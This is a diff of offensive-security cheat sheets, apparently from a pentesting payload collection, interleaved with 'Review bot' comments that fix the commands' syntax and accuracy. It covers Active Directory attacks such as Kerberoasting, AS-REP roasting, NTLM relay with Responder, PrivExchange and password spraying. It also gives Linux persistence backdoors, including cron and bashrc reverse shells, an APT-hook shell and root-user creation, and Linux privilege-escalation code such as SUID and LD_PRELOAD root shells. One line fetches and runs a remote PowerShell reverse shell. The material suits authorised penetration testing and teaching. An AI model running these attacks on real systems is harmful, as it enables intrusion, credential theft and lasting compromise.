active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40 2018-12-03 17:11:11
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$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
```
Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
```powershell
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
```
Then crack the ticket with hashcat or john
```powershell
hashcat -m 13100 -a 0 hash.txt crackstation.txt
./john ~/hash.txt --wordlist=rockyou.lst
```
### KRB_AS_REP Roasting
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
```powershell
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.3.4
[*] Action: AS-REP roasting
[*] Target User : TestOU3user
[*] Target Domain : testlab.local
[*] SamAccountName : TestOU3user
[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
``` ```
### Pass-the-Hash ### Pass-the-Hash
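Review bot: `git clone https://github.com/GhostPack/Rubeus#asreproast` will not clone; `#asreproast` is a README anchor, not part of a git URL, so drop the fragment. The AS-REP hash shown (`$krb5asrep$TestOU3user@testlab.local:...`) is in John's layout; hashcat needs the etype prefix (`$krb5asrep$23$...`, mode 18200), which Rubeus produces with `/format:hashcat`, and the hunk only gives cracking commands for TGS hashes (mode 13100), so add the AS-REP equivalent. In the Kerberoast intro, "any domain service" should be narrowed to SPNs registered on user accounts: machine-account tickets can be requested but their long random passwords are not crackable, and `GetUserSPNs.py` already applies that filter, as the single `Administrator` row in the output shows.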
@@ -364,6 +558,29 @@ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
klist klist
``` ```
### Capturing and cracking NTLMv2 hashes
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
```python
python Responder.py -I eth0
```
Then crack the hash with `hashcat`
```powershell
hashcat -m 5600 -a 0 hash.txt crackstation.txt
```
### NTLMv2 hashes relaying
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
4. Wait for a shell
### Dangerous Built-in Groups Usage ### Dangerous Built-in Groups Usage
AdminSDHolder AdminSDHolder
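Review bot: "ask for the NTLMv2 hash" is imprecise, and the distinction drives the next section: what Responder captures is a NetNTLMv2 challenge/response, which can be cracked offline (hashcat 5600, as shown) but cannot be passed like an NT hash; relaying works only because the response is forwarded live while the challenge is still valid. Step 1 should also say why SMB and HTTP are set to `Off` in Responder.conf: Responder must not answer on those ports itself or MultiRelay cannot bind them. Minor: the Responder invocation is fenced as ```python although it is a shell command.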
@@ -391,59 +608,73 @@ SourceName TargetName TrustType TrustDirection
domainA.local domainB.local TreeRoot Bidirectional domainA.local domainB.local TreeRoot Bidirectional
``` ```
## Privilege Escalation ### PrivExchange attack
### PrivEsc Local Admin - Token Impersonation (RottenPotato) Exchange your privileges for Domain Admin privs by abusing Exchange.
You need a shell on a user account with a mailbox.
Binary available at : https://github.com/foxglovesec/RottenPotato 1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
Binary available at : https://github.com/breenmachine/RottenPotatoNG ```bash
# https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
```c # https://github.com/G0ldenGunSec/PowerPriv
getuid powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
getprivs ```
use incognito
list\_tokens -u 2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
cd c:\temp\ 3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
execute -Hc -f ./rot.exe ```bash
impersonate\_token "NT AUTHORITY\SYSTEM" python secretsdump.py xxxxxxxxxx -just-dc
``` ```
Alternatively you can use the Metasploit module
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
### Password spraying
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
```powershell ```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
``` ```
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
Check if the patch is installed : `wmic qfe list | find "3139914"`
```powershell ```powershell
Powershell: crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
``` ```
### PrivEsc Local Admin - MS17-010 (Eternal Blue) Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
```
### From Local Admin to Domain Admin
```powershell ```powershell
net user hacker2 hacker123 /add /Domain python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
net group "Domain Admins" hacker2 /add /domain
``` ```
## Documentation / Thanks to Using [hydra]() and [ncrack]() to target RDP services.
```powershell
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
ncrack connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
```
Most of the time the best passwords to spray are :
- Password1
- Welcome1
- $Companyname1
## References
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
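Review bot: the `[hydra]()` and `[ncrack]()` links in the new RDP bruteforce paragraph have empty URL targets, and the `ncrack connection-limit 1` line is missing the option's leading dashes (ncrack spells it `--connection-limit`). The nmap line as rendered (`nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>`) shows the same loss of `--` in front of `open`, `max-hostgroup` and `script`, and the NSE script is named `smb-vuln-ms17-010`; restoring the flags would let both commands copy-paste cleanly.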
@@ -469,3 +700,15 @@ net group "Domain Admins" hacker2 /add /domain
* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
* [WHATS SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)

@@ -1,5 +1,21 @@
# Linux - Persistence # Linux - Persistence
## Summary
* [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
* [Backdooring a startup service](#backdoor-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh)
* [Tips](#tips)
* [References](#references)
## Basic reverse shell ## Basic reverse shell
```bash ```bash
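Review bot: several anchors in the new Summary do not match the headings as renamed later in this file: `#backdooring-an-users-bash-rc` points at a section now titled `## Backdooring a user's bash_rc` (GitHub generates `#backdooring-a-users-bash_rc` for that), `#backdooring-an-user-startup-file` at `## Backdooring a user startup file` (`#backdooring-a-user-startup-file`), and `#backdoor-a-startup-service` differs from its own link text "Backdooring a startup service". Regenerate the anchors from the final heading text so the table of contents resolves.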
@@ -8,6 +24,14 @@ ncat --sctp -lvp 4242
ncat --tcp -lvp 4242 ncat --tcp -lvp 4242
``` ```
## Add a root user
```powershell
sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john
```
## Suid Binary ## Suid Binary
```powershell ```powershell
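Review bot: `passwd --stdin` in the new "Add a root user" block is a Red Hat family extension; the `passwd` shipped by Debian and Ubuntu has no `--stdin` option, so the third line fails there (`echo 'john:linuxpassword' | chpasswd` is the portable form), and that line also drops the `sudo` the first two lines use. The block tags shell commands as ```powershell; ```bash would match the reverse shell and crontab sections in the same file.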
@@ -19,13 +43,15 @@ chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant chmod 4777 $TMPDIR2/croissant
``` ```
## Crontab (Reverse shell to 192.168.1.2 on port 4242) ## Crontab - Reverse shell
```bash ```bash
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
``` ```
## Backdooring an user's bash_rc (FR/EN Version) ## Backdooring a user's bash_rc
(FR/EN Version)
```bash ```bash
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
@@ -48,9 +74,9 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
``` ```
## Backdooring an user startup file ## Backdooring a user startup file
Linux, write a file in `~/.config/autostart/NOM_OF_FILE.desktop` Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`
```powershell ```powershell
In : ~/.config/autostart/*.desktop In : ~/.config/autostart/*.desktop
@@ -79,6 +105,14 @@ Next time "apt-get update" is done, your CMD will be executed!
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
``` ```
## Backdooring the SSH
Add an ssh key into the `~/.ssh` folder.
1. `ssh-keygen`
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
## Tips ## Tips
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
@@ -121,7 +155,7 @@ The following directories are temporary and usually writeable
/dev/shm/ /dev/shm/
``` ```
## Thanks to ## References
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)

@@ -0,0 +1,646 @@
# Linux - Privilege Escalation
## Tools
- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
```powershell
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
```
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker)
- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
## Summary
* [Checklist](#checklist)
* [Looting for passwords](#looting-for-passwords)
* [Files containing passwords](#files-containing-passwords)
* [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
* [Last edited files](#last-edited-files)
* [In memory passwords](#in-memory-passwords)
* [Find sensitive files](#find-sensitive-files)
* [Scheduled tasks](#scheduled-tasks)
* [Cron jobs](#cron-jobs)
* [Systemd timers](#systemd-timers)
* [SUID](#suid)
* [Find SUID binaries](#find-suid-binaries)
* [Create a SUID binary](#create-a-suid-binary)
* [Capabilities](#capabilities)
* [List capabilities of binaries](#list-capabilities-of-binaries)
* [Edit capabilities](#edit-capabilities)
* [Interesting capabilities](#interesting-capabilities)
* [SUDO](#sudo)
* [NOPASSWD](#nopasswd)
* [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
* [Doas](#doas)
* [sudo_inject](#sudo-inject)
* [GTFOBins](#gtfobins)
* [Wildcard](#wildcard)
* [Writable files](#writable-files)
* [Writable /etc/passwd](#writable-etcpasswd)
* [Writable /etc/sudoers](#writable-etcsudoers)
* [NFS Root Squashing](#nfs-root-squashing)
* [Shared Library](#shared-library)
* [ldconfig](#ldconfig)
* [RPATH](#rpath)
* [Groups](#groups)
* [Docker](#docker)
* [LXC/LXD](#lxclxd)
* [Kernel Exploits](#kernel-exploits)
* [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
* [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
* [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
* [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
## Checklists
* Kernel and distribution release details
* System Information:
* Hostname
* Networking details:
* Current IP
* Default route details
* DNS server information
* User Information:
* Current user details
* Last logged on users
* Shows users logged onto the host
* List all users including uid/gid information
* List root accounts
* Extracts password policies and hash storage method information
* Checks umask value
* Checks if password hashes are stored in /etc/passwd
* Extract full details for 'default' uid's such as 0, 1000, 1001 etc
* Attempt to read restricted files i.e. /etc/shadow
* List current users history files (i.e .bash_history, .nano_history etc.)
* Basic SSH checks
* Privileged access:
* Which users have recently used sudo
* Determine if /etc/sudoers is accessible
* Determine if the current user has Sudo access without a password
* Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
* Is root's home directory accessible
* List permissions for /home/
* Environmental:
* Display current $PATH
* Displays env information
* Jobs/Tasks:
* List all cron jobs
* Locate all world-writable cron jobs
* Locate cron jobs owned by other users of the system
* List the active and inactive systemd timers
* Services:
* List network connections (TCP & UDP)
* List running processes
* Lookup and list process binaries and associated permissions
* List inetd.conf/xined.conf contents and associated binary file permissions
* List init.d binary permissions
* Version Information (of the following):
* Sudo
* MYSQL
* Postgres
* Apache
* Checks user config
* Shows enabled modules
* Checks for htpasswd files
* View www directories
* Default/Weak Credentials:
* Checks for default/weak Postgres accounts
* Checks for default/weak MYSQL accounts
* Searches:
* Locate all SUID/GUID files
* Locate all world-writable SUID/GUID files
* Locate all SUID/GUID files owned by root
* Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
* Locate files with POSIX capabilities
* List all world-writable files
* Find/list all accessible *.plan files and display contents
* Find/list all accessible *.rhosts files and display contents
* Show NFS server details
* Locate *.conf and *.log files containing keyword supplied at script runtime
* List all *.conf files located in /etc
* Locate mail
* Platform/software specific tests:
* Checks to determine if we're in a Docker container
* Checks to see if the host has Docker installed
* Checks to determine if we're in an LXC container
## Looting for passwords
### Files containing passwords
```powershell
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
```
### Old passwords in /etc/security/opasswd
The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes
### Last edited files
Files that were edited in the last 10 minutes
```powershell
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
```
### In memory passwords
```powershell
strings /dev/mem -n10 | grep -i PASS
```
### Find sensitive files
```powershell
$ locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
...
```
## Scheduled tasks
### Cron jobs
Check if you have access with write permission on these files.
Check inside the file, to find other paths with write permissions.
```powershell
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
/etc/sudoers
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root
crontab -l
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
```
## Systemd timers
```powershell
systemctl list-timers --all
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service
Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
3 timers listed.
```
## SUID
SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`.
```powershell
╭─swissky@lab ~
╰─$ ls /usr/bin/sudo -alh
-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo
```
### Find SUID binaries
```bash
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
```
### Create a SUID binary
```bash
print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c
gcc -o /tmp/suid /tmp/suid.c
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit
```
## Capabilities
### List capabilities of binaries
```bash
╭─swissky@lab ~
╰─$ /usr/bin/getcap -r /usr/bin
/usr/bin/fping = cap_net_raw+ep
/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/rlogin = cap_net_bind_service+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/rsh = cap_net_bind_service+ep
/usr/bin/rcp = cap_net_bind_service+ep
```
### Edit capabilities
```powershell
/usr/bin/setcap -r /bin/ping # remove
/usr/bin/setcap cap_net_raw+p /bin/ping # add
```
### Interesting capabilities
Having the capability =ep means the binary has all the capabilities.
```powershell
$ getcap openssl /usr/bin/openssl
openssl=ep
```
Alternatively the following capabilities can be used in order to upgrade your current privileges.
```powershell
cap_dac_read_search # read anything
cap_setuid+ep # setuid
```
Example of privilege escalation with `cap_setuid+ep`
```powershell
$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)
```
## SUDO
### NOPASSWD
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
```bash
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
```
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
```bash
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
```
### LD_PRELOAD and NOPASSWD
If `LD_PRELOAD` is explicitly defined in the sudoers file
```powershell
Defaults env_keep += LD_PRELOAD
```
Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
```powershell
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
```
Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
### Doas
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```bash
permit nopass demo as root cmd vim
```
### sudo_inject
Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
```powershell
$ sudo whatever
[sudo] password for user:
# Press <ctrl>+c since you don't have the password.
# This creates an invalid sudo tokens.
$ sh exploit.sh
.... wait 1 seconds
$ sudo -i # no password required :)
# id
uid=0(root) gid=0(root) groups=0(root)
```
Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
## GTFOBins
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
> gdb -nx -ex '!sh' -ex quit
> sudo mysql -e '\! /bin/sh'
> strace -o /dev/null /bin/sh
> sudo awk 'BEGIN {system("/bin/sh")}'
## Wildcard
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
```powershell
# create file for exploitation
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
# vulnerable script
tar cf archive.tar *
```
Tool: [wildpwn](https://github.com/localh0t/wildpwn)
## Writable files
List world writable files on the system.
```powershell
find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
```
### Writable /etc/passwd
First generate a password with one of the following commands.
```powershell
openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
```
Then add the user `hacker` and add the generated password.
```powershell
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
```
E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
You can now use the `su` command with `hacker:hacker`
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
```powershell
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
```
NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`.
### Writable /etc/sudoers
```powershell
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
```
## NFS Root Squashing
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
```powershell
# create dir
mkdir /tmp/nfsdir
# mount directory
mount -t nfs 10.10.10.10:/shared /tmp/nfsdir
cd /tmp/nfsdir
# copy wanted shell
cp /bin/bash .
# set suid permission
chmod +s bash
```
## Shared Library
### ldconfig
Identify shared libraries with `ldd`
```powershell
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
```
Create a library in `/tmp` and activate the path.
```powershell
gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
```
### RPATH
```powershell
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000f (RPATH) Library rpath: [/var/tmp/flag15]
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)
```
By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable.
```powershell
level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
```
Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
```powershell
#include<stdlib.h>
#define SHELL "/bin/sh"
